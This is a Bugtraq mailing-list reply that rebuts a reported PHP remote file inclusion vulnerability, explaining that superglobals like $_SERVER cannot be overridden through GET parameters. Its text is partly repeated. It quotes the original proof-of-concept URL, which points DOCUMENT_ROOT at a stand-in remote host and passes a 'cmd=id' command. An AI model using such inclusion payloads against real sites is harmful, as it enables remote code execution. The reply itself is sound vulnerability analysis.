*Of course* this does not work. Setting register_globals to "On" causes the
contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be
registered in the global variable namespace. But the superglobals
*themselves* are special. They shadow everything - you cannot define your own
$_SERVER array, nor can it be overridden with HTTP GET or POST values. If
that were possible, using the superglobals would be useless; all scripts
would be vulnerable unless register_globals is off.
Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it
would be fair to let PHP scripts rely on this, and not consider all scripts
that don't initialize their variables as vulnerable unless they require
register_globals to be on (this is not to say that it's not a good idea to
initialize variables).
And it would of course be nice if people posting to Bugtraq actually tested
their PoCs first. Can't the moderator spot obvious cases like this, or are
all vaguely relevant posts accepted, potentially for public ridicule?
--
Magnus Holmgren holmgren (at) lysator.liu (dot) se [email concealed]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
> include.php ;
>
> Lines 4 ;
>
> include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
>
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.tx
t?&
>cmd=id
*Of course* this does not work. Setting register_globals to "On" causes the
contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be
registered in the global variable namespace. But the superglobals
*themselves* are special. They shadow everything - you cannot define your own
$_SERVER array, nor can it be overridden with HTTP GET or POST values. If
that were possible, using the superglobals would be useless; all scripts
would be vulnerable unless register_globals is off.
PoC:
echo '$_SERVER[DOCUMENT_ROOT] = ', $_SERVER[DOCUMENT_ROOT], "<br/>";
echo '$_GET["_SERVER"][DOCUMENT_ROOT] = ', $_GET["_SERVER"]
[DOCUMENT_ROOT], "<br/>";
Outputs:
$_SERVER[DOCUMENT_ROOT] = /home/www/docs
$_GET["_SERVER"][DOCUMENT_ROOT] = /foo
If the query string is _SERVER[DOCUMENT_ROOT]=/foo
========================================================================
=
Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it
would be fair to let PHP scripts rely on this, and not consider all scripts
that don't initialize their variables as vulnerable unless they require
register_globals to be on (this is not to say that it's not a good idea to
initialize variables).
And it would of course be nice if people posting to Bugtraq actually tested
their PoCs first. Can't the moderator spot obvious cases like this, or are
all vaguely relevant posts accepted, potentially for public ridicule?
--
Magnus Holmgren holmgren (at) lysator.liu (dot) se [email concealed]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQBGwWTXk7mRNn1h4+YRAq/VAKDPqifGWdOz5Jb+OUCM4rzWl/gsaACfQkyB
hzwR0RlNr2pJVWkdKQjIDzw=
=ODKz
-----END PGP SIGNATURE-----
[ reply ]